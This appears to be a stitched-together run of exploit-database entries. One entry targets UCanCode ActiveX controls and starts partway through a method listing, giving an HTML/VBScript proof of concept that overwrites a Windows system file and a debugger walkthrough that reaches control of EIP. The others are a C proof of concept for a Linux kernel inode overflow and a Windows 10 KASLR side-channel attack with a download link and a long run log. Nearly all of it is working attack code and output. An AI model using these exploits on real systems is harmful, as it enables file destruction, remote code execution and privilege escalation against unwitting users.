Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function SaveDocument (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------

3) various Write methods:

----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Function Write (ByVal lpszFileName As String) As Boolean
----------------------------------------

PROOF OF CONCEPT:
<html>
 <object classid="clsid:B6A3BF2C-F770-4182-BE7F-103BF2C76826" id="test"></object>
  <script language = "vbscript">
   test.SaveTemplateToFile buff,C:\Windows\_system.ini
  </script>
</html>

----------------------------------------
----------------------------------------

REMOTE CODE EXECUTION

This product is so poor coded that remote code execution is possible using a lot of functions (and I'm lazy),
so here it is the description of just one of it, "AddDWordUserProperty":

CPU Disasm
Address   Hex dump          Command                                  Comments
...
...
1007FEB5  |.  8D5424 44     LEA EDX,[LOCAL.36]
1007FEB9  |.  51            PUSH ECX
1007FEBA  |.  8B06          MOV EAX,DWORD PTR DS:[ESI] <- WE CAN CONTROL ESI
1007FEBC  |.  52            PUSH EDX
1007FEBD  |.  8BCE          MOV ECX,ESI
1007FEBF  |.  C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA  |.  897C24 10     MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE  |.  FF90 04030000 CALL DWORD PTR DS:[EAX+304]
1007FED4  |.  85C0          TEST EAX,EAX
...
...
Registers:
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 015DD1D0
ECX 015DD194
EDX 015DD1D0
EBX 00000000
ESP 015DD188
EBP 015DD300
ESI 41414141 <- FIRST ARGUMENT PASSED TO AddDWordUserProperty METHOD
EDI 42424242 <- SECOND ARGUMENT PASSED TO AddDWordUserProperty METHOD
EIP 1007FEBA UCCVIE~1_OCX.1007FEBA

----------------------------------------------------------------------

We can use it to pass a valid memory address so that we can find a more comfortable situation :)
CPU Disasm
Address   Hex dump          Command                                  Comments
...
...
1007FEB5  |.  8D5424 44     LEA EDX,[LOCAL.36]
1007FEB9  |.  51            PUSH ECX
1007FEBA  |.  8B06          MOV EAX,DWORD PTR DS:[ESI]
1007FEBC  |.  52            PUSH EDX
1007FEBD  |.  8BCE          MOV ECX,ESI
1007FEBF  |.  C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0
1007FECA  |.  897C24 10     MOV DWORD PTR SS:[LOCAL.51],EDI
1007FECE  |.  FF90 04030000 CALL DWORD PTR DS:[EAX+304] <- WE NOW ARE IN CONTROL OF EAX
1007FED4  |.  85C0          TEST EAX,EAX
...
...

Registers
CPU - thread 9. (00000B38), module UCCVIE~1_OCX
EAX 45454545 <- THIS VALUE THAT WAS PREVIOUSLY STORED IN MEMORY, IF WE CHANGE IT IN ANOTHER VALID ADDRESS...
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD184
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 1007FECE UCCVIE~1_OCX.1007FECE
And...
CPU - thread 9. (00000B38)
EAX 0002FDBC
ECX 00030040 ASCII "EEEE"
EDX 015DD1D0
EBX 00000000
ESP 015DD180
EBP 015DD300
ESI 00030040 ASCII "EEEE"
EDI 42424242
EIP 46464646 <- BINGO :)

----------------------------------------
----------------------------------------

BONUS STAGE:
There are a huge number of DoS... happy hunting :)
Peace, your friendly neighborhood shinnai.
---------------------------------------------------------------------
HireHackking 
/*  Linux Kernel 2.6.32-642 / 3.16.0-4 'inode' Integer Overflow PoC

  The inode is a data structure in a Unix-style file system which describes a filesystem 
  object such as a file or a directory. Each inode stores the attributes and disk block 
  locations of the object's data. Filesystem object attributes may include metadata, as 
  well as owner and permission data.

  INODE can be overflowed by mapping a single file too many times, allowing for a local 
  user to possibly gain root access.

  Disclaimer:
  This or previous program is for Educational purpose ONLY. Do not  use it without permission. 
  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any 
  damages caused by direct or indirect use of the information or functionality provided 
  by these programs. The author or any Internet provider bears NO responsibility for content 
  or misuse of these programs or any derivatives thereof. By using these programs you accept 
  the fac that any damage (dataloss, system crash, system compromise, etc.) caused by the use 
  of these programs is not Todor Donev's responsibility.

  Thanks to Maya Hristova and all friends.

  Suggestions,comments and job offers are welcome!
  
  Copyright 2016 (c) Todor Donev
  Varna, Bulgaria
  todor.donev@gmail.com
  https://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg
  http://pastebin.com/u/hackerscommunity  

*/
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
void main(){
int fd, i;
fd = open("/dev/zero", O_RDONLY);
for(i = 0; i < 26999; i++){
mmap((char*)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
}
}
HireHackking 
Complete Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40823.zip

Presentation:
https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf


I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016

Requirements

Intel Processor (Haswell or newer)
Windows 10 x64
Usage

Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:

C:\Users\qa\Desktop>ASLRSideChannelAttack.exe
+] Setting thread affinity to CPU 0
+] Getting all the potential PML4 SelfRef
+] Mapping a page oracle
+] Allocating probing target pages...
Allocation 0: 0000020E339D0000
Allocation 1: 0000020E339E0000
Allocation 2: 0000020E339F0000
Allocation 3: 0000020E33A00000
Allocation 4: 0000020E33A10000
--------------------------
+] Check that Unammped and Mapped values are consistent across several executions!
--------------------------
Unmapped Initial: 256.683746
Mapped Initial: 203.692978
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.440018
Mapped: 202.827560
--------------------------

Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213
+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563
+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382
+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256
+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175
+] PTE FFFF810804020100 looks mapped! - Time: 204.740097
+] Removing 102 from initial array and pushing it into final array
Potential SelfRef: FFFF81C0E0703818
+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774
+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921
+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726
+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874
Time difference exceed for ffff818804020100, retrying...
+] PTE FFFF818804020100 looks mapped! - Time: 209.071213
+] Removing 103 from initial array and pushing it into final array
Time difference exceed for ffff824120904820, retrying...
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642
Time difference exceed for ffff82010719cf00, retrying...
+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593
+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344
+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862
+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263
+] PTE FFFF820804020100 looks mapped! - Time: 204.585739
+] Removing 104 from initial array and pushing it into final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003
Time difference exceed for ffff8341a0d06830, retrying...
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657
+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697
+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016
+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504
+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126
+] PTE FFFF830804020100 looks mapped! - Time: 193.314758
+] Removing 106 from initial array and pushing it into final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973
+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693
+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097
+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660
+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816
+] PTE FFFF838804020100 looks mapped! - Time: 204.008743
+] Removing 107 from initial array and pushing it into final array
Time difference exceed for ffff89c4e2713898, retrying...
Time difference exceed for ffff8bc5e2f178b8, retrying...
Time difference exceed for ffff8c46231188c0, retrying...
Unmapped Initial: 248.508636
Mapped Initial: 207.139847
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 236.360733
Mapped: 195.650040
--------------------------

Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363
Potential SelfRef: FFFF81C0E0703818
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393
Time difference exceed for ffff81810719cf00, retrying...
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645
+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724
+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167
+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160
+] PTE FFFF818804020100 looks mapped! - Time: 195.728439
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF81C0E0703818 - Index: 103
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff818000000000
-] Erasing 103 from final array
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759
+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019
+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364
+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826
+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143
+] PTE FFFF820804020100 looks mapped! - Time: 198.158585
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff820000000000
-] Erasing 104 from final array
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823
+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525
+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040
+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254
+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034
+] PTE FFFF830804020100 looks mapped! - Time: 197.613953
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff830000000000
-] Erasing 106 from final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380
Time difference exceed for ffff83810719cf00, retrying...
Time difference exceed for ffff83810719cf00, retrying...
Unmapped Initial: 232.123840
Mapped Initial: 196.420654
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 234.845581
Mapped: 187.862518
--------------------------

Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938
+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784
+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733
+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182
+] PTE FFFF810804020100 looks mapped! - Time: 199.812225
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff810000000000
Time difference exceed for ffff810000000000, retrying...
-] Erasing 102 from final array
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 230.247162
Mapped Initial: 198.023987
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 235.923035
Mapped: 191.605301
--------------------------

Time difference exceed for ffff83c1e0f07838, retrying...
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 258.041046
Mapped Initial: 210.309753
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 238.757538
Mapped: 203.896240
--------------------------

Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102
+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836
+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333
+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445
+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763
+] PTE FFFF838804020100 looks mapped! - Time: 203.243607
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff838000000000
-] Erasing 107 from final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221
+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138
+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006
+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943
+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639
+] PTE FFFF828804020100 looks mapped! - Time: 196.754044
+] Removing 105 from initial array and pushing it into final array
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff90c864321908, retrying...
Unmapped Initial: 257.754272
Mapped Initial: 207.903702
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.145935
Mapped: 207.792923
--------------------------

Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092
+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715
+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614
+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837
+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796
+] PTE FFFF828804020100 looks mapped! - Time: 208.765045
PML4e: FFFF82C160B05828 - Index: 105
KNOWN_UNMAPPED PTE: ffff828000000000
-] Erasing 105 from final array
-] Removing 100 as it seems to be unmapped
-] Removing 101 as it seems to be unmapped
-] Removing 108 as it seems to be unmapped
-] Removing 109 as it seems to be unmapped
-] Removing 10a as it seems to be unmapped
-] Removing 10b as it seems to be unmapped
-] Removing 10c as it seems to be unmapped
-] Removing 10d as it seems to be unmapped
Time difference exceed for ffff8743a1d0e870, retrying...
-] Removing 10e as it seems to be unmapped
-] Removing 10f as it seems to be unmapped
-] Removing 110 as it seems to be unmapped
Time difference exceed for ffff88c462311888, retrying...
-] Removing 111 as it seems to be unmapped
-] Removing 112 as it seems to be unmapped
-] Removing 113 as it seems to be unmapped
Time difference exceed for ffff8a45229148a0, retrying...
-] Removing 114 as it seems to be unmapped
-] Removing 115 as it seems to be unmapped
-] Removing 116 as it seems to be unmapped
-] Removing 117 as it seems to be unmapped
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffe8f47a3d1e88, retrying...
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379
+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694
+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502
+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920
+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059
+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246
+] Removing 1ec from initial array and pushing it into final array
Unmapped Initial: 233.678802
Mapped Initial: 214.496124
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 250.585373
Mapped: 213.339661
--------------------------

Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174
+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457
+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861
+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334
+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160
+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926
PML4e: FFFFF67B3D9ECF60 - Index: 1ec
KNOWN_UNMAPPED PTE: fffff60000000000
Real PML4 SelfRef Found: fffff67b3d9ecf60
Left in Potential Array: ffff8c46231188c0
Left in Potential Array: ffff8cc6633198c8
Left in Potential Array: ffff8d46a351a8d0
Left in Potential Array: ffff8dc6e371b8d8
Left in Potential Array: ffff8e472391c8e0
Left in Potential Array: ffff8ec763b1d8e8
Left in Potential Array: ffff8f47a3d1e8f0
Left in Potential Array: ffff8fc7e3f1f8f8
Left in Potential Array: ffff904824120900
Left in Potential Array: ffff90c864321908
Left in Potential Array: ffff9148a4522910
Left in Potential Array: ffff91c8e4723918
Left in Potential Array: ffff924924924920
Left in Potential Array: ffff92c964b25928
Left in Potential Array: ffff9349a4d26930
Left in Potential Array: ffff93c9e4f27938
Left in Potential Array: ffff944a25128940
Left in Potential Array: ffff94ca65329948
Left in Potential Array: ffff954aa552a950
Left in Potential Array: ffff95cae572b958
Left in Potential Array: ffff964b2592c960
Left in Potential Array: ffff96cb65b2d968
Left in Potential Array: ffff974ba5d2e970
Left in Potential Array: ffff97cbe5f2f978
Left in Potential Array: ffff984c26130980
Left in Potential Array: ffff98cc66331988
Left in Potential Array: ffff994ca6532990
Left in Potential Array: ffff99cce6733998
Left in Potential Array: ffff9a4d269349a0
Left in Potential Array: ffff9acd66b359a8
Left in Potential Array: ffff9b4da6d369b0
Left in Potential Array: ffff9bcde6f379b8
Left in Potential Array: ffff9c4e271389c0
Left in Potential Array: ffff9cce673399c8
Left in Potential Array: ffff9d4ea753a9d0
Left in Potential Array: ffff9dcee773b9d8
Left in Potential Array: ffff9e4f2793c9e0
Left in Potential Array: ffff9ecf67b3d9e8
Left in Potential Array: ffff9f4fa7d3e9f0
Left in Potential Array: ffff9fcfe7f3f9f8
Left in Potential Array: ffffa05028140a00
Left in Potential Array: ffffa0d068341a08
Left in Potential Array: ffffa150a8542a10
Left in Potential Array: ffffa1d0e8743a18
Left in Potential Array: ffffa25128944a20
Left in Potential Array: ffffa2d168b45a28
Left in Potential Array: ffffa351a8d46a30
Left in Potential Array: ffffa3d1e8f47a38
Left in Potential Array: ffffa45229148a40
Left in Potential Array: ffffa4d269349a48
Left in Potential Array: ffffa552a954aa50
Left in Potential Array: ffffa5d2e974ba58
Left in Potential Array: ffffa6532994ca60
Left in Potential Array: ffffa6d369b4da68
Left in Potential Array: ffffa753a9d4ea70
Left in Potential Array: ffffa7d3e9f4fa78
Left in Potential Array: ffffa8542a150a80
Left in Potential Array: ffffa8d46a351a88
Left in Potential Array: ffffa954aa552a90
Left in Potential Array: ffffa9d4ea753a98
Left in Potential Array: ffffaa552a954aa0
Left in Potential Array: ffffaad56ab55aa8
Left in Potential Array: ffffab55aad56ab0
Left in Potential Array: ffffabd5eaf57ab8
Left in Potential Array: ffffac562b158ac0
Left in Potential Array: ffffacd66b359ac8
Left in Potential Array: ffffad56ab55aad0
Left in Potential Array: ffffadd6eb75bad8
Left in Potential Array: ffffae572b95cae0
Left in Potential Array: ffffaed76bb5dae8
Left in Potential Array: ffffaf57abd5eaf0
Left in Potential Array: ffffafd7ebf5faf8
Left in Potential Array: ffffb0582c160b00
Left in Potential Array: ffffb0d86c361b08
Left in Potential Array: ffffb158ac562b10
Left in Potential Array: ffffb1d8ec763b18
Left in Potential Array: ffffb2592c964b20
Left in Potential Array: ffffb2d96cb65b28
Left in Potential Array: ffffb359acd66b30
Left in Potential Array: ffffb3d9ecf67b38
Left in Potential Array: ffffb45a2d168b40
Left in Potential Array: ffffb4da6d369b48
Left in Potential Array: ffffb55aad56ab50
Left in Potential Array: ffffb5daed76bb58
Left in Potential Array: ffffb65b2d96cb60
Left in Potential Array: ffffb6db6db6db68
Left in Potential Array: ffffb75badd6eb70
Left in Potential Array: ffffb7dbedf6fb78
Left in Potential Array: ffffb85c2e170b80
Left in Potential Array: ffffb8dc6e371b88
Left in Potential Array: ffffb95cae572b90
Left in Potential Array: ffffb9dcee773b98
Left in Potential Array: ffffba5d2e974ba0
Left in Potential Array: ffffbadd6eb75ba8
Left in Potential Array: ffffbb5daed76bb0
Left in Potential Array: ffffbbddeef77bb8
Left in Potential Array: ffffbc5e2f178bc0
Left in Potential Array: ffffbcde6f379bc8
Left in Potential Array: ffffbd5eaf57abd0
Left in Potential Array: ffffbddeef77bbd8
Left in Potential Array: ffffbe5f2f97cbe0
Left in Potential Array: ffffbedf6fb7dbe8
Left in Potential Array: ffffbf5fafd7ebf0
Left in Potential Array: ffffbfdfeff7fbf8
Left in Potential Array: ffffc06030180c00
Left in Potential Array: ffffc0e070381c08
Left in Potential Array: ffffc160b0582c10
Left in Potential Array: ffffc1e0f0783c18
Left in Potential Array: ffffc26130984c20
Left in Potential Array: ffffc2e170b85c28
Left in Potential Array: ffffc361b0d86c30
Left in Potential Array: ffffc3e1f0f87c38
Left in Potential Array: ffffc46231188c40
Left in Potential Array: ffffc4e271389c48
Left in Potential Array: ffffc562b158ac50
Left in Potential Array: ffffc5e2f178bc58
Left in Potential Array: ffffc6633198cc60
Left in Potential Array: ffffc6e371b8dc68
Left in Potential Array: ffffc763b1d8ec70
Left in Potential Array: ffffc7e3f1f8fc78
Left in Potential Array: ffffc86432190c80
Left in Potential Array: ffffc8e472391c88
Left in Potential Array: ffffc964b2592c90
Left in Potential Array: ffffc9e4f2793c98
Left in Potential Array: ffffca6532994ca0
Left in Potential Array: ffffcae572b95ca8
Left in Potential Array: ffffcb65b2d96cb0
